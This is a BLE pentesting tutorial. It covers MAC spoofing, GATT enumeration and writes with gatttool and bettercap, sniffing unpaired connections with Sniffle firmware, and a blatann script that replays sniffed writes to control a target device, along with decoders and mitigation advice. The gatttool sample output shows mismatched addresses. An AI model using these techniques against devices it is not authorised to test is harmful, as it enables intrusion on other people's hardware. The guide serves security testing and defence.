Pentesting BLE - Bluetooth Low Energy

Introduction

Available since the Bluetooth 4.0 specification, BLE uses only 40 channels, covering the range of 2400 to 2483.5 MHz. By contrast, classic Bluetooth uses 79 channels in that same range.

BLE devices communicate by sending advertising packets (beacons); these packets broadcast the existence of the BLE device to other nearby devices. These beacons sometimes also carry data.

The listening device, also called the central device, can respond to an advertising packet with a SCAN request sent specifically to the advertising device. The response to that scan uses the same structure as the advertising packet, with additional information that could not fit in the initial advertising packet, such as the full device name.

The preamble byte synchronizes the frequency, whereas the four-byte access address is a connection identifier, used in scenarios where multiple devices are trying to establish connections on the same channels. Next, the Protocol Data Unit (PDU) contains the advertising data. There are several types of PDU; the most commonly used are ADV_NONCONN_IND and ADV_IND. Devices use the ADV_NONCONN_IND PDU type if they do not accept connections and transmit data only in the advertising packet. Devices use ADV_IND if they allow connections; they stop sending advertising packets once a connection has been established.
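As an added example (not code from the original page), here is a decoder for the advertising-channel frame layout described above: the access address, the header carrying the PDU type and the TxAdd bit, the advertiser address, and the AD structures inside the advertising data (flags, 16-bit service UUIDs, device name). The sample frame is constructed for this example; the PDU type, AD type and access address values are the standard Core Specification assignments.

```python
ADV_ACCESS_ADDRESS = 0x8E89BED6  # fixed access address on the advertising channels (37, 38, 39)
PDU_TYPES = {0x0: "ADV_IND", 0x1: "ADV_DIRECT_IND", 0x2: "ADV_NONCONN_IND", 0x3: "SCAN_REQ",
             0x4: "SCAN_RSP", 0x5: "CONNECT_IND", 0x6: "ADV_SCAN_IND"}
AD_TYPES = {0x01: "Flags", 0x03: "Complete 16-bit UUIDs", 0x08: "Shortened Local Name",
            0x09: "Complete Local Name", 0xFF: "Manufacturer Specific"}

def parse_ad_structures(data: bytes) -> dict:
    """Split AdvData into [len][type][payload] AD structures and decode the common ones."""
    out, i = {}, 0
    while i < len(data):
        length = data[i]
        if length == 0 or i + 1 + length > len(data):
            break  # zero-length or truncated structure: stop instead of over-reading
        ad_type, payload = data[i + 1], data[i + 2:i + 1 + length]
        name = AD_TYPES.get(ad_type, f"AD 0x{ad_type:02x}")
        if ad_type in (0x08, 0x09):
            out[name] = payload.decode("utf-8", errors="replace")
        elif ad_type == 0x03:  # list of little-endian 16-bit UUIDs
            out[name] = [f"{int.from_bytes(payload[j:j + 2], 'little'):04x}"
                         for j in range(0, len(payload) - 1, 2)]
        else:
            out[name] = payload.hex()
        i += 1 + length
    return out

def parse_adv_frame(frame: bytes) -> dict:
    """Parse access address + advertising PDU (header, AdvA, AdvData); preamble already stripped."""
    access = int.from_bytes(frame[0:4], "little")
    if access != ADV_ACCESS_ADDRESS:
        raise ValueError(f"not an advertising-channel frame: access address 0x{access:08x}")
    header, length = frame[4], frame[5]
    payload = frame[6:6 + length]
    if length < 6 or len(payload) != length:
        raise ValueError("truncated advertising PDU")
    pdu_type = PDU_TYPES.get(header & 0x0F, "UNKNOWN")
    return {
        "pdu_type": pdu_type,
        "connectable": pdu_type in ("ADV_IND", "ADV_DIRECT_IND"),
        "addr_type": "random" if header & 0x40 else "public",  # TxAdd bit of the header
        "adv_addr": ":".join(f"{b:02X}" for b in reversed(payload[:6])),  # AdvA is sent LSB first
        "ad": parse_ad_structures(payload[6:]),
    }

# Constructed sample frame (not a real capture): ADV_IND from random address 24:62:AB:B1:A8:3E
SAMPLE_FRAME = bytes.fromhex(
    "d6be898e"              # access address 0x8E89BED6, little-endian on the air
    "4017" "3ea8b1ab6224"   # header: PDU type 0 (ADV_IND), TxAdd=1, length 23; then AdvA
    "020106"                # Flags: LE General Discoverable, BR/EDR not supported
    "03030218"              # Complete 16-bit UUIDs: 0x1802 (Immediate Alert)
    "09094d79426561636f6e"  # Complete Local Name "MyBeacon"
)
```

Swapping the header byte for 0x42 turns the same frame into an ADV_NONCONN_IND, which the decoder reports as non-connectable.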

GATT

The Generic Attribute Profile (GATT) defines how a device should format and transfer data. When you analyze the attack surface of a BLE device, you will often concentrate on GATT (or GATTs), because it is how device functionality gets triggered and how data gets stored, grouped, and modified. GATT lists a device's characteristics, descriptors, and services in a table as 16- or 32-bit values. A characteristic is a data value sent between the central device and the peripheral. These characteristics can have descriptors that provide additional information about them. Characteristics are often grouped into services if they are related to performing a particular action.

Enumeration

```bash
hciconfig #Check config, check if UP or DOWN
# If DOWN try:
sudo modprobe -c bluetooth
sudo hciconfig hci0 down && sudo hciconfig hci0 up

# Spoof MAC
spooftooph -i hci0 -a 11:22:33:44:55:66
```

GATTool

GATTool allows establishing a connection with another device, listing that device's characteristics, and reading and writing its attributes.
GATTTool can launch an interactive shell with the -I option:

```bash
gatttool -i hci0 -I
[ ][LE]> connect 24:62:AB:B1:A8:3E
Attempting to connect to A4:CF:12:6C:B3:76
Connection successful
[A4:CF:12:6C:B3:76][LE]> characteristics
handle: 0x0002, char properties: 0x20, char value handle: 0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb
handle: 0x0015, char properties: 0x02, char value handle: 0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb
[...]

# Write data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-write-req <characteristic handle> -n <value>
gatttool -b a4:cf:12:6c:b3:76 --char-write-req -a 0x002e -n $(echo -n "04dc54d9053b4307680a"|xxd -ps)

# Read data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-read -a 0x16

# Read connecting with an authenticated encrypted connection
gatttool --sec-level=high -b a4:cf:12:6c:b3:76 --char-read -a 0x002c
```

Bettercap

```bash
# Start listening for beacons
sudo bettercap --eval "ble.recon on"
# Wait some time
>> ble.show # Show discovered devices
>> ble.enum <mac addr> # This will show the service, characteristics and properties supported

# Write data in a characteristic
>> ble.write <MAC ADDR> <UUID> <HEX DATA>
>> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06
```

Sniffing and actively controlling unpaired BLE devices

Many low-cost BLE peripherals do not enforce pairing/bonding. Without bonding, the Link Layer encryption is never enabled, so ATT/GATT traffic is in cleartext. An off-path sniffer can follow the connection, decode GATT operations to learn characteristic handles and values, and any nearby host can then connect and replay those writes to control the device.

Sniffing with Sniffle (CC26x2/CC1352)

Hardware: Sonoff Zigbee 3.0 USB Dongle Plus (CC26x2/CC1352) reflashed with NCC Group's Sniffle firmware.

Install Sniffle and its Wireshark extcap on Linux:

```bash
if [ ! -d /opt/sniffle/Sniffle-1.10.0/python_cli ]; then
    echo "[+] - Sniffle not installed! Installing at 1.10.0..."
    sudo mkdir -p /opt/sniffle
    sudo chown -R $USER:$USER /opt/sniffle
    pushd /opt/sniffle
    wget https://github.com/nccgroup/Sniffle/archive/refs/tags/v1.10.0.tar.gz
    tar xvf v1.10.0.tar.gz
    # Install Wireshark extcap for user and root only
    mkdir -p $HOME/.local/lib/wireshark/extcap
    ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py $HOME/.local/lib/wireshark/extcap
    sudo mkdir -p /root/.local/lib/wireshark/extcap
    sudo ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py /root/.local/lib/wireshark/extcap
    popd
else
    echo "[+] - Sniffle already installed at 1.10.0"
fi
```

Flash the Sonoff with the Sniffle firmware (make sure your serial device matches, e.g. /dev/ttyUSB0):

```bash
pushd /opt/sniffle/
wget https://github.com/nccgroup/Sniffle/releases/download/v1.10.0/sniffle_cc1352p1_cc2652p1_1M.hex
git clone https://github.com/sultanqasim/cc2538-bsl.git
cd cc2538-bsl
python3 -m venv .venv
source .venv/bin/activate
python3 -m pip install pyserial intelhex
python3 cc2538-bsl.py -p /dev/ttyUSB0 --bootloader-sonoff-usb -ewv ../sniffle_cc1352p1_cc2652p1_1M.hex
deactivate
popd
```

Capture in Wireshark through the Sniffle extcap and pivot quickly to state-changing writes with the filter:

```text
_ws.col.info contains "Sent Write Command"
```

This shows the ATT Write Commands sent by the client; the handle and value often map directly to device actions (e.g., writing 0x01 to a buzzer/alert characteristic starts it, 0x00 stops it).
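The filter above matches on Wireshark's Info column; the following added example (not code from the original page) shows what that selection looks like at the byte level: a minimal decoder for the ATT PDUs behind Read Request, Write Request and Write Command, plus a function that keeps only the Write Commands as (handle, value) pairs, which is useful when reviewing a capture without the dissector or writing detection logic over one. The sample PDUs are constructed; the opcodes and layout are the standard Attribute Protocol definitions.

```python
from typing import Iterable

# ATT opcodes involved in GATT reads/writes (Bluetooth Core Spec, Attribute Protocol)
ATT_OPCODES = {0x0A: "Read Request", 0x0B: "Read Response", 0x12: "Write Request",
               0x13: "Write Response", 0x52: "Write Command",
               0x1B: "Handle Value Notification", 0x1D: "Handle Value Indication"}
COMMAND_BIT, SIGNED_BIT = 0x40, 0x80  # 0x52 is Write Request 0x12 with the Command bit set
HANDLE_PDUS = {0x0A, 0x12, 0x52, 0x1B, 0x1D}  # PDUs whose bytes 1..2 are a little-endian handle

def decode_att(pdu: bytes) -> dict:
    """Decode one ATT PDU into opcode name, flags, and (where present) handle and value."""
    if not pdu:
        raise ValueError("empty ATT PDU")
    opcode = pdu[0]
    base = opcode & 0x7F  # drop the Authentication Signature flag for the opcode lookup
    info = {"opcode": opcode, "name": ATT_OPCODES.get(base, f"opcode 0x{opcode:02x}"),
            "is_command": bool(opcode & COMMAND_BIT), "signed": bool(opcode & SIGNED_BIT)}
    if base in HANDLE_PDUS:
        if len(pdu) < 3:
            raise ValueError("truncated ATT PDU: handle missing")
        info["handle"] = int.from_bytes(pdu[1:3], "little")
        info["value"] = pdu[3:].hex()  # empty for a Read Request
    return info

def find_write_commands(pdus: Iterable[bytes]) -> list[dict]:
    """Same selection as the Wireshark filter: unsigned Write Commands as (handle, value) pairs."""
    return [{"handle": d["handle"], "value": d["value"]}
            for d in map(decode_att, pdus) if d["opcode"] == 0x52]

# Constructed client->server ATT PDUs (not from a real capture)
SAMPLE_PDUS = [
    bytes.fromhex("0a1600"),      # Read Request, handle 0x0016
    bytes.fromhex("520b0001"),    # Write Command, handle 0x000b, value 01 (e.g. start the buzzer)
    bytes.fromhex("122e0004dc"),  # Write Request, handle 0x002e, value 04dc (server must answer)
    bytes.fromhex("520b0000"),    # Write Command, handle 0x000b, value 00 (stop)
]
```

A Write Command never gets a response, so a peripheral that rejects it for insufficient permissions does so silently; only a Write Request surfaces the ATT error to the client.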

Quick Sniffle CLI examples:

```bash
python3 scanner.py --output scan.pcap
# Only devices with very strong signal
python3 scanner.py --rssi -40
# Filter advertisements containing a string
python3 sniffer.py --string "banana" --output sniff.pcap
```

Sniffer alternative: Nordic's nRF Sniffer for BLE plus its Wireshark plugin also works. On small/cheap Nordic dongles you usually overwrite the USB bootloader to load the sniffer firmware, so either keep a dedicated sniffer dongle or expect to need J-Link/JTAG to restore the bootloader later.

Active control via GATT

Once you have identified a writable characteristic handle and value from the sniffed traffic, connect as any central and send the same write:

  • Using Nordic nRF Connect for Desktop (BLE app):
    • Select the nRF52/nRF52840 dongle, scan and connect to the target.
    • Browse the GATT database and locate the target characteristic (it often has a friendly name, e.g., Alert Level).
    • Perform a Write with the sniffed bytes (e.g., 01 to trigger, 00 to stop).
  • Automate on Windows with a Nordic dongle using Python + blatann:

```python
import time
import blatann

# CONFIG
COM_PORT = "COM29"  # Replace with your COM port
TARGET_MAC = "5B:B1:7F:47:A7:00"  # Replace with your target MAC

# ",p" marks the address as a public address
target_address = blatann.peer.PeerAddress.from_string(TARGET_MAC + ",p")

# CONNECT
ble_device = blatann.BleDevice(COM_PORT)
ble_device.configure()
ble_device.open()
print(f"[-] Connecting to {TARGET_MAC}...")
peer = ble_device.connect(target_address).wait()
if not peer:
    print("[!] Connection failed.")
    ble_device.close()
    raise SystemExit(1)

print("Connected. Discovering services...")
peer.discover_services().wait(5, exception_on_timeout=False)

# Example: write 0x01/0x00 to a known handle
for service in peer.database.services:
    for ch in service.characteristics:
        if ch.handle == 0x000b:  # Replace with your handle
            print("[!] Beeping.")
            ch.write(b"\x01")
            time.sleep(2)
            print("[+] And relax.")
            ch.write(b"\x00")

print("[-] Disconnecting...")
peer.disconnect()
peer.wait_for_disconnect()
ble_device.close()
```

Operational notes and mitigations

  • Prefer Sonoff+Sniffle on Linux for robust channel hopping and connection following. Keep a spare Nordic sniffer as a backup.
  • Without pairing/bonding, any nearby attacker can observe writes and replay or craft their own against unauthenticated writable characteristics.
  • Mitigations: require pairing/bonding and enforce encryption; set characteristic permissions so that writes require an authenticated link; keep unauthenticated writable characteristics to a minimum; verify the GATT ACLs with Sniffle/nRF Connect.
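To support the last bullet (auditing which characteristics a device exposes to unauthenticated writes), here is an added example, not code from the original page, that parses the output of gatttool's characteristics command from the GATTool section (tolerating line-wrapped output), decodes the properties bitmask, and lists the characteristics that accept Write Command (write-without-response), the operation the Wireshark filter above matches. The sample output is constructed: the two characteristics shown on this page plus an assumed Alert Level characteristic (UUID 0x2a06) at handle 0x000b.

```python
import re

# Characteristic property bits as printed in gatttool's "char properties" field
CHAR_PROPS = {0x01: "broadcast", 0x02: "read", 0x04: "write-without-response", 0x08: "write",
              0x10: "notify", 0x20: "indicate", 0x40: "authenticated-signed-writes",
              0x80: "extended-properties"}
LINE_RE = re.compile(r"handle:\s*(0x[0-9a-f]+),\s*char properties:\s*(0x[0-9a-f]+),\s*"
                     r"char value handle:\s*(0x[0-9a-f]+),\s*uuid:\s*([0-9a-f-]+)", re.I)

def decode_props(mask: int) -> list[str]:
    """Expand the properties bitmask into the names of the operations it advertises."""
    return [name for bit, name in CHAR_PROPS.items() if mask & bit]

def parse_characteristics(output: str) -> list[dict]:
    """Parse gatttool 'characteristics' output; a line not starting with 'handle:' continues the previous one."""
    joined = re.sub(r"\n(?!handle:)", " ", output)
    chars = []
    for m in LINE_RE.finditer(joined):
        chars.append({"handle": int(m.group(1), 16), "value_handle": int(m.group(3), 16),
                      "uuid": m.group(4).lower(), "props": decode_props(int(m.group(2), 16))})
    return chars

def writable_without_response(chars: list[dict]) -> list[dict]:
    """Characteristics accepting ATT Write Command: the server sends no response, so a rejection is invisible."""
    return [c for c in chars if "write-without-response" in c["props"]]

# Constructed sample output (wrapped as the page shows it); 0x000a/0x000b is an assumed Alert Level characteristic
SAMPLE_OUTPUT = """\
handle: 0x0002, char properties: 0x20, char value handle:
0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb
handle: 0x0015, char properties: 0x02, char value handle:
0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb
handle: 0x000a, char properties: 0x0c, char value handle:
0x000b, uuid: 00002a06-0000-1000-8000-00805f9b34fb
"""
```

Properties only state which operations a characteristic exposes, not whether the link must be encrypted or authenticated for them; that attribute permission is only revealed when the server rejects the operation, so follow up each writable handle with a read or Write Request at the default security level versus --sec-level=high, as in the GATTool section.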
